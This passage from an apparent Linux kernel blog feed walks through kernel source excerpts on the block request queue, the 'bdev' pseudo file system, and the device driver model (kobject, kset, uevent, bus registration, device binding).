if (test_bit(QUEUE_FLAG_SAME_COMP, &q->queue_flags))
req->cpu = raw_smp_processor_id();
plug = current->plug;
if (plug) {
/*
* If this is the first request added after a plug, fire
* of a plug trace.
*/
if (!request_count)
trace_block_plug(q);
else {
if (request_count >= BLK_MAX_REQUEST_COUNT) {
blk_flush_plug_list(plug, false);
trace_block_plug(q);
}
}
list_add_tail(&req->queuelist, &plug->list);
blk_account_io_start(req, true);
} else {
spin_lock_irq(q->queue_lock);
add_acct_request(q, req, where);
__blk_run_queue(q);
out_unlock:
spin_unlock_irq(q->queue_lock);
}
}
</code></pre></div></div>
<p>‘blk_queue_bio’ reorders or merges the bio with current requests if it can. If not, this function allocates a new request and uses the bio to initializes the request. The requests are processed in function ‘__blk_run_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void __blk_run_queue(struct request_queue *q)
{
if (unlikely(blk_queue_stopped(q)))
return;
__blk_run_queue_uncond(q);
}
inline void __blk_run_queue_uncond(struct request_queue *q)
{
if (unlikely(blk_queue_dead(q)))
return;
/*
* Some request_fn implementations, e.g. scsi_request_fn(), unlock
* the queue lock internally. As a result multiple threads may be
* running such a request function concurrently. Keep track of the
* number of active request_fn invocations such that blk_drain_queue()
* can wait until all these request_fn calls have finished.
*/
q->request_fn_active++;
q->request_fn(q);
q->request_fn_active--;
}
</code></pre></div></div>
<p>In here we see it call the ‘request_fn’ we implement in device driver.
For now we can distinguish the difference ‘request’ and ‘make_request’ method. When the block device driver uses ‘request’, the file system send the bio to block subsystem it is processed by the ‘blk_queue_bio’, ‘blk_queue_bio’ do a lot of work to optimize the bio and convert the bio to requests and call the driver’s implementation of ‘request_fn’ callback. As for ‘make_request’ method, the driver actually implement his own ‘blk_queue_bio’, so these bio will not go to the IO scheduler and goes directly to the device driver’s implementation of ‘make_request_fn’. So the self-implementation of ‘make_request_fn’ need to process the bios directly, not the request.
Most of the block device driver will use the ‘request’ method.
So end of the long article, hope you enjoy it.</p>
Anatomy of the Linux 'bdev' file system2018-06-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-bdev-file-system
<p>‘bdev’ file system is used for block device’s inode.
This fs is initialized in function ‘bdev_cache_init’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init bdev_cache_init(void)
{
int err;
static struct vfsmount *bd_mnt;
bdev_cachep = kmem_cache_create("bdev_cache", sizeof(struct bdev_inode),
0, (SLAB_HWCACHE_ALIGN|SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD|SLAB_PANIC),
init_once);
err = register_filesystem(&bd_type);
if (err)
panic("Cannot register bdev pseudo-fs");
bd_mnt = kern_mount(&bd_type);
if (IS_ERR(bd_mnt))
panic("Cannot create bdev pseudo-fs");
blockdev_superblock = bd_mnt->mnt_sb; /* For writeback */
#define kern_mount(type) kern_mount_data(type, NULL)
struct vfsmount *kern_mount_data(struct file_system_type *type, void *data)
{
struct vfsmount *mnt;
mnt = vfs_kern_mount(type, MS_KERNMOUNT, type->name, data);
if (!IS_ERR(mnt)) {
/*
* it is a longterm mount, don't release mnt until
* we unmount before file sys is unregistered
*/
real_mount(mnt)->mnt_ns = MNT_NS_INTERNAL;
}
return mnt;
}
struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>After registering ‘bdev’ fs, the initialize function mounts it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct dentry *
mount_fs(struct file_system_type *type, int flags, const char *name, void *data)
{
struct dentry *root;
struct super_block *sb;
char *secdata = NULL;
int error = -ENOMEM;
...
root = type->mount(type, flags, name, data);
if (IS_ERR(root)) {
error = PTR_ERR(root);
goto out_free_secdata;
}
sb = root->d_sb;
BUG_ON(!sb);
WARN_ON(!sb->s_bdi);
WARN_ON(sb->s_bdi == &default_backing_dev_info);
sb->s_flags |= MS_BORN;
...
/*
* filesystems should never set s_maxbytes larger than MAX_LFS_FILESIZE
* but s_maxbytes was an unsigned long long for many releases. Throw
* this warning for a little while to try and catch filesystems that
* violate this rule.
*/
WARN((sb->s_maxbytes < 0), "%s set sb->s_maxbytes to "
"negative value (%lld)\n", type->name, sb->s_maxbytes);
up_write(&sb->s_umount);
free_secdata(secdata);
return root;
out_sb:
dput(root);
deactivate_locked_super(sb);
out_free_secdata:
free_secdata(secdata);
out:
return ERR_PTR(error);
}
</code></pre></div></div>
<p>‘mount_fs’ first call ‘type->mount’ to get a root dentry. This type->mount is ‘‘bd_mount’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct dentry *bd_mount(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data)
{
return mount_pseudo(fs_type, "bdev:", &bdev_sops, NULL, BDEVFS_MAGIC);
}
struct dentry *mount_pseudo(struct file_system_type *fs_type, char *name,
const struct super_operations *ops,
const struct dentry_operations *dops, unsigned long magic)
{
struct super_block *s;
struct dentry *dentry;
struct inode *root;
struct qstr d_name = QSTR_INIT(name, strlen(name));
s = sget(fs_type, NULL, set_anon_super, MS_NOUSER, NULL);
if (IS_ERR(s))
return ERR_CAST(s);
s->s_maxbytes = MAX_LFS_FILESIZE;
s->s_blocksize = PAGE_SIZE;
s->s_blocksize_bits = PAGE_SHIFT;
s->s_magic = magic;
s->s_op = ops ? ops : &simple_super_operations;
s->s_time_gran = 1;
root = new_inode(s);
if (!root)
goto Enomem;
/*
* since this is the first inode, make it number 1. New inodes created
* after this must take care not to collide with it (by passing
* max_reserved of 1 to iunique).
*/
root->i_ino = 1;
root->i_mode = S_IFDIR | S_IRUSR | S_IWUSR;
root->i_atime = root->i_mtime = root->i_ctime = CURRENT_TIME;
dentry = __d_alloc(s, &d_name);
if (!dentry) {
iput(root);
goto Enomem;
}
d_instantiate(dentry, root);
s->s_root = dentry;
s->s_d_op = dops;
s->s_flags |= MS_ACTIVE;
return dget(s->s_root);
Enomem:
deactivate_locked_super(s);
return ERR_PTR(-ENOMEM);
}
</code></pre></div></div>
<p>In’ mount_pseudo’, we first allocate a super_block and then allocate the root inode and dentry and initialize these data. The super_operations for this ‘bdev’ fs is ‘bdev_sops’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct super_operations bdev_sops = {
.statfs = simple_statfs,
.alloc_inode = bdev_alloc_inode,
.destroy_inode = bdev_destroy_inode,
.drop_inode = generic_delete_inode,
.evict_inode = bdev_evict_inode,
};
</code></pre></div></div>
<p>Finally the super block in ‘bd_mnt->mnt_sb’ is assigned the global variable ‘blockdev_superblock’. After ‘bdev’ is registered, the structure has following shape.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> super_operations
+--------------+
| |
+--------------|
|bdev_alloc_inode
blockde^_superblock +--------------+
+----------+ | |
| | | |
| | | |
+----------+ | |
| s_op +---------> +--------------+
+----------+
| s_root +---------> +--------------+ inode
+----------+ | | +---------+
| | | |
| | | |
| | | |
+--------------+ | |
| d_inode +-------> +---------+
+--------------+
dentry
</code></pre></div></div>
Anatomy of the Linux device driver model2018-06-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/10/linux-device-driver-model
<p>Welcome back the anatomy series articles, this one we will talk about the Linux device driver model.</p>
<h2 id="kobject-and-kset">kobject and kset</h2>
<p>kobject and kset is the basis of device driver model. Every kobject represent a kernel object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kobject {
const char *name;
struct list_head entry;
struct kobject *parent;
struct kset *kset;
struct kobj_type *ktype;
struct sysfs_dirent *sd;
struct kref kref;
#ifdef CONFIG_DEBUG_KOBJECT_RELEASE
struct delayed_work release;
#endif
unsigned int state_initialized:1;
unsigned int state_in_sysfs:1;
unsigned int state_add_uevent_sent:1;
unsigned int state_remove_uevent_sent:1;
unsigned int uevent_suppress:1;
};
</code></pre></div></div>
<p>‘name’ indicates the object’s name and will be show in a directory in sysfs file system.
‘parent’ indicates the object’s parent, this makes objects’ hierarchical structure.
‘kset’ can be considered as a connection of the same kobject.
‘ktype’ represents the object’s type, different objects has different type. kernel connects ‘ktype’ with the object’s sysfs’s file operations and attributes file.
‘sd’ indicates a directory entry instance in sysfs file syste.
‘uevent_suppress’ indicates whether the ‘kset’ of this object belongs to should send an uevent to the userspace.</p>
<p>‘kobject_init’ function is used to initialize a kobject.
‘kobject_add’ function create the object hierarchical and also create directory in sysfs, this directory will lies in ‘parent’ (while a parent is not NULL) or in the kset directory(parent is NULL) or in the root(if both NULL).</p>
<h3 id="kobjects-attributes">kobject’s attributes</h3>
<p>There is a kobj_type field in kobject。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kobj_type {
void (*release)(struct kobject *kobj);
const struct sysfs_ops *sysfs_ops;
struct attribute **default_attrs;
const struct kobj_ns_type_operations *(*child_ns_type)(struct kobject *kobj);
const void *(*namespace)(struct kobject *kobj);
};
struct sysfs_ops {
ssize_t (*show)(struct kobject *, struct attribute *, char *);
ssize_t (*store)(struct kobject *, struct attribute *, const char *, size_t);
};
struct attribute {
const char *name;
umode_t mode;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
bool ignore_lockdep:1;
struct lock_class_key *key;
struct lock_class_key skey;
#endif
};
</code></pre></div></div>
<p>‘default_attrs’ defines some attributes and sysfs_ops defines the operations that operates the attribute.</p>
<p>‘sysfs_create_file’ can be used for creating an attribute file in kobject.
When the userspace opena file in sysfs, ‘sysfs_open_file’ will be called, it allocates a struct ‘struct sysfs_open_file ’ of and call ‘sysfs_get_open_dirent’, the later will set the</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ((struct seq_file *)file->private_data)->private = data;
</code></pre></div></div>
<p>Later in writing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t sysfs_write_file(struct file *file, const char __user *user_buf,
size_t count, loff_t *ppos)
{
struct sysfs_open_file *of = sysfs_of(file);
ssize_t len = min_t(size_t, count, PAGE_SIZE);
loff_t size = file_inode(file)->i_size;
char *buf;
if (sysfs_is_bin(of->sd) && size) {
if (size <= *ppos)
return 0;
len = min_t(ssize_t, len, size - *ppos);
}
if (!len)
return 0;
buf = kmalloc(len + 1, GFP_KERNEL);
if (!buf)
return -ENOMEM;
if (copy_from_user(buf, user_buf, len)) {
len = -EFAULT;
goto out_free;
}
buf[len] = '\0'; /* guarantee string termination */
len = flush_write_buffer(of, buf, *ppos, len);
if (len > 0)
*ppos += len;
out_free:
kfree(buf);
return len;
}
static struct sysfs_open_file *sysfs_of(struct file *file)
{
return ((struct seq_file *)file->private_data)->private;
}
static int flush_write_buffer(struct sysfs_open_file *of, char *buf, loff_t off,
size_t count)
{
struct kobject *kobj = of->sd->s_parent->s_dir.kobj;
int rc = 0;
const struct sysfs_ops *ops = sysfs_file_ops(of->sd);
rc = ops->store(kobj, of->sd->s_attr.attr, buf, count);
return rc;
}
</code></pre></div></div>
<p>call the sysfs_ops store through sysfs_open_file struct of.</p>
<h3 id="kset">kset</h3>
<p>kset is a collection of kobjects, it self is a kobject so it has a kobject field.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset {
struct list_head list;
spinlock_t list_lock;
struct kobject kobj;
const struct kset_uevent_ops *uevent_ops;
};
</code></pre></div></div>
<p>‘list’ links the kobjects belongs to this kset.
‘uevent_ops’ defines some function pointers, when some of the kobjects’ status has changed, it will call these function pointers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset_uevent_ops {
int (* const filter)(struct kset *kset, struct kobject *kobj);
const char *(* const name)(struct kset *kset, struct kobject *kobj);
int (* const uevent)(struct kset *kset, struct kobject *kobj,
struct kobj_uevent_env *env);
};
</code></pre></div></div>
<p>We can use ‘kset_register’ to register and add a kset to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kset_register(struct kset *k)
{
int err;
if (!k)
return -EINVAL;
kset_init(k);
err = kobject_add_internal(&k->kobj);
if (err)
return err;
kobject_uevent(&k->kobj, KOBJ_ADD);
return 0;
}
</code></pre></div></div>
<p>The only interesting thing is ‘kobject_uevent’, this is used to send an event to userspace that something about kobject has happened, KOBJ_ADD for this example. So if one kobject doen’t belong to no kset, he can’t send such event to userspace.
Below show the relation between kset and kobject.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kset
+-----------+-----+
uevent_ops<----+ |kobj | |
| | | |
+-----+--+--+-----+
^
|parent
kset |
+--------+--+-----+
uevent_ops<----+ |kobj | |
+ +----+ | | |
| +-----+-----+-----+
list| ^
| |kset
v |
+-----+ +-----+ +-----+
|kobj +---> |kobj +------> |kobj |
| | | | | |
+-----+ +--+--+ +-----+
^
|parent
|
+--+--+
|kobj |
| |
+-----+
</code></pre></div></div>
<h3 id="uevent-and-call_usermodehelper">uevent and call_usermodehelper</h3>
<p>Hotplug mechanism can be considered as follows, when one device plug into the system , the kernel can notify the userspace program and the userspace program can load the device’s driver, when it removes, it can remove the driver. There ares two methods to notify the userspace, one is udev and the other is /sbin/hotplug. Both need the kernel’s support, kobject_uevent’. This function is the base of udev or /sbin/hotplug, it can send uevent or call call_usermodehelper function to create a user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kobject_uevent(struct kobject *kobj, enum kobject_action action)
{
return kobject_uevent_env(kobj, action, NULL);
}
int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
char *envp_ext[])
{
struct kobj_uevent_env *env;
const char *action_string = kobject_actions[action];
const char *devpath = NULL;
const char *subsystem;
struct kobject *top_kobj;
struct kset *kset;
const struct kset_uevent_ops *uevent_ops;
int i = 0;
int retval = 0;
#ifdef CONFIG_NET
struct uevent_sock *ue_sk;
#endif
pr_debug("kobject: '%s' (%p): %s\n",
kobject_name(kobj), kobj, __func__);
/* search the kset we belong to */
top_kobj = kobj;
while (!top_kobj->kset && top_kobj->parent)
top_kobj = top_kobj->parent;
if (!top_kobj->kset) {
pr_debug("kobject: '%s' (%p): %s: attempted to send uevent "
"without kset!\n", kobject_name(kobj), kobj,
__func__);
return -EINVAL;
}
kset = top_kobj->kset;
uevent_ops = kset->uevent_ops;
/* skip the event, if uevent_suppress is set*/
if (kobj->uevent_suppress) {
pr_debug("kobject: '%s' (%p): %s: uevent_suppress "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* skip the event, if the filter returns zero. */
if (uevent_ops && uevent_ops->filter)
if (!uevent_ops->filter(kset, kobj)) {
pr_debug("kobject: '%s' (%p): %s: filter function "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* default keys */
retval = add_uevent_var(env, "ACTION=%s", action_string);
if (retval)
goto exit;
retval = add_uevent_var(env, "DEVPATH=%s", devpath);
if (retval)
goto exit;
retval = add_uevent_var(env, "SUBSYSTEM=%s", subsystem);
if (retval)
goto exit;
/* let the kset specific function add its stuff */
if (uevent_ops && uevent_ops->uevent) {
retval = uevent_ops->uevent(kset, kobj, env);
if (retval) {
pr_debug("kobject: '%s' (%p): %s: uevent() returned "
"%d\n", kobject_name(kobj), kobj,
__func__, retval);
goto exit;
}
}
/*
#if defined(CONFIG_NET)
/* send netlink message */
list_for_each_entry(ue_sk, &uevent_sock_list, list) {
struct sock *uevent_sock = ue_sk->sk;
struct sk_buff *skb;
size_t len;
if (!netlink_has_listeners(uevent_sock, 1))
continue;
/* allocate message with the maximum possible size */
len = strlen(action_string) + strlen(devpath) + 2;
skb = alloc_skb(len + env->buflen, GFP_KERNEL);
if (skb) {
char *scratch;
/* add header */
scratch = skb_put(skb, len);
sprintf(scratch, "%s@%s", action_string, devpath);
/* copy keys to our continuous event payload buffer */
for (i = 0; i < env->envp_idx; i++) {
len = strlen(env->envp[i]) + 1;
scratch = skb_put(skb, len);
strcpy(scratch, env->envp[i]);
}
NETLINK_CB(skb).dst_group = 1;
retval = netlink_broadcast_filtered(uevent_sock, skb,
0, 1, GFP_KERNEL,
kobj_bcast_filter,
kobj);
/* ENOBUFS should be handled in userspace */
if (retval == -ENOBUFS || retval == -ESRCH)
retval = 0;
} else
retval = -ENOMEM;
}
#endif
mutex_unlock(&uevent_sock_mutex);
/* call uevent_helper, usually only enabled during early boot */
if (uevent_helper[0] && !kobj_usermode_filter(kobj)) {
char *argv [3];
argv [0] = uevent_helper;
argv [1] = (char *)subsystem;
argv [2] = NULL;
retval = add_uevent_var(env, "HOME=/");
if (retval)
goto exit;
retval = add_uevent_var(env,
"PATH=/sbin:/bin:/usr/sbin:/usr/bin");
if (retval)
goto exit;
retval = call_usermodehelper(argv[0], argv,
env->envp, UMH_WAIT_EXEC);
}
exit:
kfree(devpath);
kfree(env);
return retval;
}
</code></pre></div></div>
<p>Generally, there are three steps in kobject_uevent_env.
Firstly, find the top kset, then call the filter of kset->uevent_ops.
Secondly, set the environment variable and call uevent_ops->uevent.
Finally, according the definition of CONFIG_NET it will send uevent message to userspace using netlink, or call the call_usermodehelper function to launch a userprocess from kernel.</p>
<h2 id="bus">bus</h2>
<p>Bus is one of the core concept in linux device driver. Devices and drivers is around of bus. Bus is a very low level infrastructure that device driver programmer have nearly chance to write a bus. A bus can be both backed by a physical bus such as PCI bus or just a virtual concept bus such as virtio bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct bus_type {
const char *name;
const char *dev_name;
struct device *dev_root;
struct device_attribute *dev_attrs; /* use dev_groups instead */
const struct attribute_group **bus_groups;
const struct attribute_group **dev_groups;
const struct attribute_group **drv_groups;
int (*match)(struct device *dev, struct device_driver *drv);
int (*uevent)(struct device *dev, struct kobj_uevent_env *env);
int (*probe)(struct device *dev);
int (*remove)(struct device *dev);
void (*shutdown)(struct device *dev);
int (*online)(struct device *dev);
int (*offline)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct dev_pm_ops *pm;
struct iommu_ops *iommu_ops;
struct subsys_private *p;
struct lock_class_key lock_key;
};
</code></pre></div></div>
<p>‘match’ was called whenever a new device or driver is added for this bus.
the ‘p’, struct subsys_private is used to manage the devices and drivers in this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct subsys_private {
struct kset subsys;
struct kset *devices_kset;
struct list_head interfaces;
struct mutex mutex;
struct kset *drivers_kset;
struct klist klist_devices;
struct klist klist_drivers;
struct blocking_notifier_head bus_notifier;
unsigned int drivers_autoprobe:1;
struct bus_type *bus;
struct kset glue_dirs;
struct class *class;
};
</code></pre></div></div>
<p>’ subsys’ represents the subsystem of the bus lies, every bus in system through bus_register will be has the same bus_kset, so bus_kset is the container of all buses in the system.
‘devices_kset’ represents all the devices’ kset, and ‘drivers_kset’ represents all the drivers’s kset.
‘klist_devices’ and ‘klist_drivers’ links the devices and drivers in this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_type
+--------+
| name | bus_kset
+--------+ +--------------+
| | | |kobj| |
+--------+ +--------------+
| | ^
+--------+ | dri^ers_kset
| p | subsys_pri^ate | +--------------+
+--+-----+---> +---------------+ | | |kobj| |
^ | subsys +-----+ +--------------+
| +---------------+ ^
| | drivers_kset +----------+
| +---------------+ de^ices_kset
| | devices_kset +--------------> +--------------+
| +---------------+ | |kobj| |
| | klist_devices +-------+ de^ +--------------+
| +---------------+ <----+ +----+ +----+
| | klist_drivers +--+ | +----> | +----> | |
| +---------------+ | +----+ +----+ +----+
| | | | drv
| +---------------+ +--> +----+ +----+ +----+
+-----------+ bus | | +----> | +----> | |
+---------------+ +----+ +----+ +----+
</code></pre></div></div>
<p>‘bus_register’ is used to register a bus to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int bus_register(struct bus_type *bus)
{
int retval;
struct subsys_private *priv;
struct lock_class_key *key = &bus->lock_key;
priv = kzalloc(sizeof(struct subsys_private), GFP_KERNEL);
if (!priv)
return -ENOMEM;
priv->bus = bus;
bus->p = priv;
BLOCKING_INIT_NOTIFIER_HEAD(&priv->bus_notifier);
retval = kobject_set_name(&priv->subsys.kobj, "%s", bus->name);
if (retval)
goto out;
priv->subsys.kobj.kset = bus_kset;
priv->subsys.kobj.ktype = &bus_ktype;
priv->drivers_autoprobe = 1;
retval = kset_register(&priv->subsys);
if (retval)
goto out;
retval = bus_create_file(bus, &bus_attr_uevent);
if (retval)
goto bus_uevent_fail;
priv->devices_kset = kset_create_and_add("devices", NULL,
&priv->subsys.kobj);
if (!priv->devices_kset) {
retval = -ENOMEM;
goto bus_devices_fail;
}
priv->drivers_kset = kset_create_and_add("drivers", NULL,
&priv->subsys.kobj);
if (!priv->drivers_kset) {
retval = -ENOMEM;
goto bus_drivers_fail;
}
INIT_LIST_HEAD(&priv->interfaces);
__mutex_init(&priv->mutex, "subsys mutex", key);
klist_init(&priv->klist_devices, klist_devices_get, klist_devices_put);
klist_init(&priv->klist_drivers, NULL, NULL);
retval = add_probe_files(bus);
if (retval)
goto bus_probe_files_fail;
retval = bus_add_groups(bus, bus->bus_groups);
if (retval)
goto bus_groups_fail;
pr_debug("bus: '%s': registered\n", bus->name);
return 0;
...
return retval;
}
</code></pre></div></div>
<p>First, ‘kset_register’ create a directory in /sys/bus, for example, /sys/bus/pci.
Then create two directory —-devices and drivers—-in /sys/bus/$bus using ‘kset_create_and_add’. For example /sys/bus/pci/devices and /sys/bus/pci/drivers.</p>
<p>Bus’ attributes represnet the information and configuration about the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_create_file(bus, &bus_attr_uevent);
</code></pre></div></div>
<p>BUS_ATTR is used to create bus attributes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static BUS_ATTR(uevent, S_IWUSR, NULL, bus_uevent_store);
#define BUS_ATTR(_name, _mode, _show, _store) \
struct bus_attribute bus_attr_##_name = __ATTR(_name, _mode, _show, _store)
#define BUS_ATTR_RW(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RW(_name)
#define BUS_ATTR_RO(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RO(_name)
</code></pre></div></div>
<p>User space can read/write these attributes to control bus’s behavior.</p>
<h3 id="binding-the-device-and-driver">binding the device and driver</h3>
<p>Connect the device and his corresponding driver is called binding. The bus does a lot of work to bind device and driver behind of the device driver progreammer. There are two events that will cause the bind. When one device is registered into a bus by device_register, the kernel will try to bind this device with every drivers registered in this bus. When one driver is registered into a bus by driver_registered, the kernel will try to bind this driver with every devices registered in this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int device_bind_driver(struct device *dev)
{
int ret;
ret = driver_sysfs_add(dev);
if (!ret)
driver_bound(dev);
return ret;
}
static void driver_bound(struct device *dev)
{
if (klist_node_attached(&dev->p->knode_driver)) {
printk(KERN_WARNING "%s: device %s already bound\n",
__func__, kobject_name(&dev->kobj));
return;
}
pr_debug("driver: '%s': %s: bound to device '%s'\n", dev_name(dev),
__func__, dev->driver->name);
klist_add_tail(&dev->p->knode_driver, &dev->driver->p->klist_devices);
/*
* Make sure the device is no longer in one of the deferred lists and
* kick off retrying all pending devices
*/
driver_deferred_probe_del(dev);
driver_deferred_probe_trigger();
if (dev->bus)
blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
BUS_NOTIFY_BOUND_DRIVER, dev);
}
</code></pre></div></div>
<p>device_register calls driver_bound to bind the device and drivers.
Links device private’s field knode_driver with the driver private’s klist_devices.</p>
<h2 id="device">device</h2>
<p>Linux uses struct device to represent a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device {
struct device *parent;
struct device_private *p;
struct kobject kobj;
const char *init_name; /* initial name of the device */
const struct device_type *type;
struct mutex mutex; /* mutex to synchronize calls to
* its driver.
*/
struct bus_type *bus; /* type of bus device is on */
struct device_driver *driver; /* which driver has allocated this
device */
void *platform_data; /* Platform specific data, device
core doesn't touch it */
struct dev_pm_info power;
struct dev_pm_domain *pm_domain;
#ifdef CONFIG_PINCTRL
struct dev_pin_info *pins;
#endif
#ifdef CONFIG_NUMA
int numa_node; /* NUMA node this device is close to */
#endif
u64 *dma_mask; /* dma mask (if dma'able device) */
u64 coherent_dma_mask;/* Like dma_mask, but for
alloc_coherent mappings as
not all hardware supports
64 bit addresses for consistent
allocations such descriptors. */
struct device_dma_parameters *dma_parms;
struct list_head dma_pools; /* dma pools (if dma'ble) */
struct dma_coherent_mem *dma_mem; /* internal for coherent mem
override */
#ifdef CONFIG_DMA_CMA
struct cma *cma_area; /* contiguous memory area for dma
allocations */
#endif
/* arch specific additions */
struct dev_archdata archdata;
struct device_node *of_node; /* associated device tree node */
struct acpi_dev_node acpi_node; /* associated ACPI device node */
dev_t devt; /* dev_t, creates the sysfs "dev" */
u32 id; /* device instance */
spinlock_t devres_lock;
struct list_head devres_head;
struct klist_node knode_class;
struct class *class;
const struct attribute_group **groups; /* optional groups */
void (*release)(struct device *dev);
struct iommu_group *iommu_group;
bool offline_disabled:1;
bool offline:1;
};
</code></pre></div></div>
<p>‘parent’ indicates the parent device.
‘kobj’ represent devices’ kobject in kernel.
‘driver’ indicates whether this device has been bind with the driver. if this is NULL, it doesn’t find his driver.</p>
<p>Every device in system is a object of struct device, so the kernel uses a kset—devices_kset as a container of devices. Kernel classify the devices as two class, one is block and the other is char. Each class has a kobject, sysfs_dev_block_kobj and sysfs_dev_char_kobj. It is initialized in “devices_init”:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init devices_init(void)
{
devices_kset = kset_create_and_add("devices", &device_uevent_ops, NULL);
if (!devices_kset)
return -ENOMEM;
dev_kobj = kobject_create_and_add("dev", NULL);
if (!dev_kobj)
goto dev_kobj_err;
sysfs_dev_block_kobj = kobject_create_and_add("block", dev_kobj);
if (!sysfs_dev_block_kobj)
goto block_kobj_err;
sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
if (!sysfs_dev_char_kobj)
goto char_kobj_err;
return 0;
char_kobj_err:
kobject_put(sysfs_dev_block_kobj);
block_kobj_err:
kobject_put(dev_kobj);
dev_kobj_err:
kset_unregister(devices_kset);
return -ENOMEM;
}
</code></pre></div></div>
<p>So this function genereates the following directory, /sys/devices, /sys/dev, /sys/dev/block and /sys/dev/char.</p>
<p>device_register is used to register a device into the system. First call device_initialize to initialize some field of the device and then calls device_add.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int device_register(struct device *dev)
{
device_initialize(dev);
return device_add(dev);
}
void device_initialize(struct device *dev)
{
dev->kobj.kset = devices_kset;
kobject_init(&dev->kobj, &device_ktype);
INIT_LIST_HEAD(&dev->dma_pools);
mutex_init(&dev->mutex);
lockdep_set_novalidate_class(&dev->mutex);
spin_lock_init(&dev->devres_lock);
INIT_LIST_HEAD(&dev->devres_head);
device_pm_init(dev);
set_dev_node(dev, -1);
}
</code></pre></div></div>
<p>‘device_add’ do a lot of work.
First it creates the topology in sysfs.
1) If both and ‘dev->class’ and ‘dev->parent’ is NULL and the device is attached to a buts, the parent is the bus’s device</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!parent && dev->bus && dev->bus->dev_root)
return &dev->bus->dev_root->kobj;
</code></pre></div></div>
<p>2) If ‘dev->class’ is NULL and ‘dev->parent’ is not NULL, easy case, dev’s directory is in ‘dev->parent->kobj’</p>
<p>3) if ‘dev->class’ is not NULL and ‘dev->parent’ is NULL, dev’s directory is in /sys/devices/virtual</p>
<p>4) both ‘dev->class’ and ‘dev->parent’ is not NULL, most complicated case, omit here.</p>
<p>Second it creates some attribute files of this device. If its mjaor is not zero, it calls ‘devtmpfs_create_node’ to create a node in devtmpfs.</p>
<p>Then bind the device with all of the driver’s in the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void bus_probe_device(struct device *dev)
{
struct bus_type *bus = dev->bus;
struct subsys_interface *sif;
int ret;
if (!bus)
return;
if (bus->p->drivers_autoprobe) {
ret = device_attach(dev);
WARN_ON(ret < 0);
}
mutex_lock(&bus->p->mutex);
list_for_each_entry(sif, &bus->p->interfaces, node)
if (sif->add_dev)
sif->add_dev(dev, sif);
mutex_unlock(&bus->p->mutex);
}
int device_attach(struct device *dev)
{
int ret = 0;
device_lock(dev);
if (dev->driver) {
if (klist_node_attached(&dev->p->knode_driver)) {
ret = 1;
goto out_unlock;
}
ret = device_bind_driver(dev);
if (ret == 0)
ret = 1;
else {
dev->driver = NULL;
ret = 0;
}
} else {
ret = bus_for_each_drv(dev->bus, NULL, dev, __device_attach);
pm_request_idle(dev);
}
out_unlock:
device_unlock(dev);
return ret;
}
